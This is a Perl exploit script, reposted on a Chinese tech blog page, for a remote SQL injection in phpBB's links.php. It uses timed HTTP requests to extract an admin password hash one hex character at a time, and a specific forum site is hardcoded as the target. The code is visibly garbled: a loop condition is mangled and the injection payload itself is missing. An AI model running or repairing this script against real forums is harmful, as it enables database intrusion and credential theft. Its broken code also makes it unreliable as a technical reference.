PHPBB links.php Remote SQL Injection-simeon技术专栏
#PHPBB links.php Remote SQL Injection #By Love Fly thanks Flyh4t,Spr1t3# webwangqi@163.com
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
######################################## CONFIGURAZIONE EXPLOIT ##########################################################################
$sito = "http://www.gbabel.com/en/forum/"; # insert vulnerable site as http:////
##########################################################################################################################################
$var = "1";
my $hash;
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
sub richiesta {
$var = $_;
$ua = LWP::UserAgent->new;
$inizio=Time::HiRes::time();
$response = $ua->request(GET $var,
s => $var);
$response->is_success() || print("$!\n");
$fine=Time::HiRes::time();
$tempo=$fine-$inizio;
return $tempo
}
sub aggiorna{
system("cls");
print "Tempo sql : " . $_ . " secondi\n";
print "Hash : " . $_ . "\n";
}
#print richiesta;
for ($i=1;$i9)
{
$hash .=chr($array[$j]);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
$j=200;
}
}
}
if($i==1)
{
if($hash eq "")
{
$i=200;
print "Attacco Fallito Sito Fixato\n";
}
}
}
print "Attacco Terminato\n\n";
system("pause");
页:
[1]